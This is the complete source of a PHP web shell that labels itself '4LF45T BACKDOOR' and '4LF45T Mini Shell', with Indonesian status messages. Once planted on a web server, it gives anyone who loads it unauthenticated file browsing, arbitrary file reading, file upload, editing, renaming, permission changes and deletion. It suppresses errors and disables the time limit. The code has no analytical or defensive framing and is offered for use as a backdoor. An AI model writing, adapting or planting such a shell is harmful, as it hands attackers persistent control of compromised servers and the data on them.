4LF45T.PHP

1. <?php
2. error_reporting(0);
3. set_time_limit(0);
4.  
5. if(get_magic_quotes_gpc()){
6. foreach($_POST as $key=>$value){
7. $_POST[$key] = stripslashes($value);
8. }
9. }
10. echo '<!DOCTYPE HTML>
11. <html>
12. <head>
13. <meta property="og:image" content="http://oi66.tinypic.com/zn0xs.jpg" alt="53430105-557504214770012-2414548526572814332-n" "="">
14. <meta name="Description" content="4LF45T SHELL...">
15. <link href="" rel="stylesheet" type="text/css">
16. <title>4LF45T BACKDOOR</title>
17. <style>
18. body{
19. font-family: "Racing Sans One", cursive;
20. background-attachment: fixed;
21. background-size:100% 100%;
22. background-image: url("https://images3.alphacoders.com/144/thumb-1920-144565.jpg");
23. background-color: black;
24. color:white;
25. }
26. #content tr:hover{
27. background-color: #8001f1;
28. text-shadow:0px 0px 0px #fff;
29. }
30. #content .first{
31. background-color: #8001f1;
32. }
33. table{
34. border: 2px #000000 solid;
35. }
36. a{
37. color:white;
38. text-decoration: none;
39. }
40. a:hover{
41. color:#73ff65;
42. text-shadow:0px 0px 0px #ffffff;
43. }
44. input,select{
45. color:#73ff65;
46. background-color:black;
47. border: 1px #8001f1 solid;
48. -moz-border-radius: 3px;
49. -webkit-border-radius:3px;
50. border-radius:3px;
51. }
52. textarea{
53. background-color:transparent;
54. border: 1px #8001f1 solid;
55. color:#73ff65;
56. }
57. </style>
58. </head>
59. <body>
60. <h1><center><font color="#8001f1">4LF45T Mini Shell</font></center></h1>
61. <table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
62. <tr><td><font color="#8001f1">Path :</font> ';
63. if(isset($_GET['path'])){
64. $path = $_GET['path'];
65. }else{
66. $path = getcwd();
67. }
68. $path = str_replace('\\','/',$path);
69. $paths = explode('/',$path);
70.  
71. foreach($paths as $id=>$pat){
72. if($pat == '' && $id == 0){
73. $a = true;
74. echo '<a href="?path=/">/</a>';
75. continue;
76. }
77. if($pat == '') continue;
78. echo '<a href="?path=';
79. for($i=0;$i<=$id;$i++){
80. echo "$paths[$i]";
81. if($i != $id) echo "/";
82. }
83. echo '">'.$pat.'</a>/';
84. }
85. echo '</td></tr><tr><td>';
86. if(isset($_FILES['file'])){
87. if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
88. echo '<font color="#73ff65">Upload Berhasil</font><br />';
89. }else{
90. echo '<font color="#8001f1">Upload Gagal</font><br/>';
91. }
92. }
93. echo '<form enctype="multipart/form-data" method="POST">
94. <font color="#8001f1">File Upload :</font> <input type="file" name="file" />
95. <input type="submit" value="upload" />
96. </form>
97. </td></tr>';
98. if(isset($_GET['filesrc'])){
99. echo "<tr><td>Current File : ";
100. echo $_GET['filesrc'];
101. echo '</tr></td></table><br />';
102. echo(' <center><textarea style="width: 700px;height: 300px;" readonly> '.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</textarea></center>');
103. }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
104. echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
105. if($_POST['opt'] == 'chmod'){
106. if(isset($_POST['perm'])){
107. if(chmod($_POST['path'],$_POST['perm'])){
108. echo '<font color="#73ff65">Change Permission Berhasil</font><br/>';
109. }else{
110. echo '<font color="#8001f1">Change Permission Gagal</font><br />';
111. }
112. }
113. echo '<form method="POST">
114. Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
115. <input type="hidden" name="path" value="'.$_POST['path'].'">
116. <input type="hidden" name="opt" value="chmod">
117. <input type="submit" value="Go" />
118. </form>';
119. }elseif($_POST['opt'] == 'rename'){
120. if(isset($_POST['newname'])){
121. if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
122. echo '<font color="#73ff65">Ganti Nama Berhasil</font><br/>';
123. }else{
124. echo '<font color="#8001f1">Ganti Nama Gagal</font><br />';
125. }
126. $_POST['name'] = $_POST['newname'];
127. }
128. echo '<form method="POST">
129. New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />
130. <input type="hidden" name="path" value="'.$_POST['path'].'">
131. <input type="hidden" name="opt" value="rename">
132. <input type="submit" value="Go" />
133. </form>';
134. }elseif($_POST['opt'] == 'edit'){
135. if(isset($_POST['src'])){
136. $fp = fopen($_POST['path'],'w');
137. if(fwrite($fp,$_POST['src'])){
138. echo '<font color="#73ff65">Berhasil Edit File</font><br/>';
139. }else{
140. echo '<font color="#8001f1">Gagal Edit File</font><br/>';
141. }
142. fclose($fp);
143. }
144. echo '<form method="POST">
145. <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
146. <input type="hidden" name="path" value="'.$_POST['path'].'">
147. <input type="hidden" name="opt" value="edit">
148. <input type="submit" value="Save" />
149. </form>';
150. }
151. echo '</center>';
152. }else{
153. echo '</table><br/><center>';
154. if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
155. if($_POST['type'] == 'dir'){
156. if(rmdir($_POST['path'])){
157. echo '<font color="#73ff65">Directory Terhapus</font><br/>';
158. }else{
159. echo '<font color="#8001f1">Directory Gagal Terhapus </font><br/>';
160. }
161. }elseif($_POST['type'] == 'file'){
162. if(unlink($_POST['path'])){
163. echo '<font color="#73ff65">File Terhapus</font><br/>';
164. }else{
165. echo '<font color="#8001f1">File Gagal Dihapus</font><br/>';
166. }
167. }
168. }
169. echo '</center>';
170. $scandir = scandir($path);
171. echo '<div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
172. <tr class="first">
173. <td><center>Name</peller></center></td>
174. <td><center>Size</peller></center></td>
175. <td><center>Permission</peller></center></td>
176. <td><center>Modify</peller></center></td>
177. </tr>';
178.  
179. foreach($scandir as $dir){
180. if(!is_dir($path.'/'.$dir) || $dir == '.' || $dir == '..') continue;
181. echo '<tr>
182. <td><a href="?path='.$path.'/'.$dir.'">'.$dir.'</a></td>
183. <td><center>--</center></td>
184. <td><center>';
185. if(is_writable($path.'/'.$dir)) echo '<font color="#73ff65">';
186. elseif(!is_readable($path.'/'.$dir)) echo '<font color="white">';
187. echo perms($path.'/'.$dir);
188. if(is_writable($path.'/'.$dir) || !is_readable($path.'/'.$dir)) echo '</font>';
189.  
190. echo '</center></td>
191. <td><center><form method="POST" action="?option&path='.$path.'">
192. <select name="opt">
193. <option value="">Select</option>
194. <option value="delete">Delete</option>
195. <option value="chmod">Chmod</option>
196. <option value="rename">Rename</option>
197. </select>
198. <input type="hidden" name="type" value="dir">
199. <input type="hidden" name="name" value="'.$dir.'">
200. <input type="hidden" name="path" value="'.$path.'/'.$dir.'">
201. <input type="submit" value=">">
202. </form></center></td>
203. </tr>';
204. }
205. echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';
206. foreach($scandir as $file){
207. if(!is_file($path.'/'.$file)) continue;
208. $size = filesize($path.'/'.$file)/1024;
209. $size = round($size,3);
210. if($size >= 1024){
211. $size = round($size/1024,2).' MB';
212. }else{
213. $size = $size.' KB';
214. }
215.  
216. echo '<tr>
217. <td><a href="?filesrc='.$path.'/'.$file.'&path='.$path.'">'.$file.'</a></td>
218. <td><center>'.$size.'</center></td>
219. <td><center>';
220. if(is_writable($path.'/'.$file)) echo '<font color="#73ff65">';
221. elseif(!is_readable($path.'/'.$file)) echo '<font color="white">';
222. echo perms($path.'/'.$file);
223. if(is_writable($path.'/'.$file) || !is_readable($path.'/'.$file)) echo '</font>';
224. echo '</center></td>
225. <td><center><form method="POST" action="?option&path='.$path.'">
226. <select name="opt">
227. <option value="">Select</option>
228. <option value="delete">Delete</option>
229. <option value="chmod">Chmod</option>
230. <option value="rename">Rename</option>
231. <option value="edit">Edit</option>
232. </select>
233. <input type="hidden" name="type" value="file">
234. <input type="hidden" name="name" value="'.$file.'">
235. <input type="hidden" name="path" value="'.$path.'/'.$file.'">
236. <input type="submit" value=">">
237. </form></center></td>
238. </tr>';
239. }
240. echo '</table>
241. </div>';
242. }
243. echo '<center><br/> </center>
244. </body>
245. </html>';
246. function perms($file){
247. $perms = fileperms($file);
248.  
249. if (($perms & 0xC000) == 0xC000) {
250. // Socket
251. $info = 's';
252. } elseif (($perms & 0xA000) == 0xA000) {
253. // Symbolic Link
254. $info = 'l';
255. } elseif (($perms & 0x8000) == 0x8000) {
256. // Regular
257. $info = '-';
258. } elseif (($perms & 0x6000) == 0x6000) {
259. // Block special
260. $info = 'b';
261. } elseif (($perms & 0x4000) == 0x4000) {
262. // Directory
263. $info = 'd';
264. } elseif (($perms & 0x2000) == 0x2000) {
265. // Character special
266. $info = 'c';
267. } elseif (($perms & 0x1000) == 0x1000) {
268. // FIFO pipe
269. $info = 'p';
270. } else {
271. // Unknown
272. $info = 'u';
273. }
274.  
275. // Owner
276. $info .= (($perms & 0x0100) ? 'r' : '-');
277. $info .= (($perms & 0x0080) ? 'w' : '-');
278. $info .= (($perms & 0x0040) ?
279. (($perms & 0x0800) ? 's' : 'x' ) :
280. (($perms & 0x0800) ? 'S' : '-'));
281.  
282. // Group
283. $info .= (($perms & 0x0020) ? 'r' : '-');
284. $info .= (($perms & 0x0010) ? 'w' : '-');
285. $info .= (($perms & 0x0008) ?
286. (($perms & 0x0400) ? 's' : 'x' ) :
287. (($perms & 0x0400) ? 'S' : '-'));
288.  
289. // World
290. $info .= (($perms & 0x0004) ? 'r' : '-');
291. $info .= (($perms & 0x0002) ? 'w' : '-');
292. $info .= (($perms & 0x0001) ?
293. (($perms & 0x0200) ? 't' : 'x' ) :
294. (($perms & 0x0200) ? 'T' : '-'));
295.  
296. return $info;
297. }
298. ?>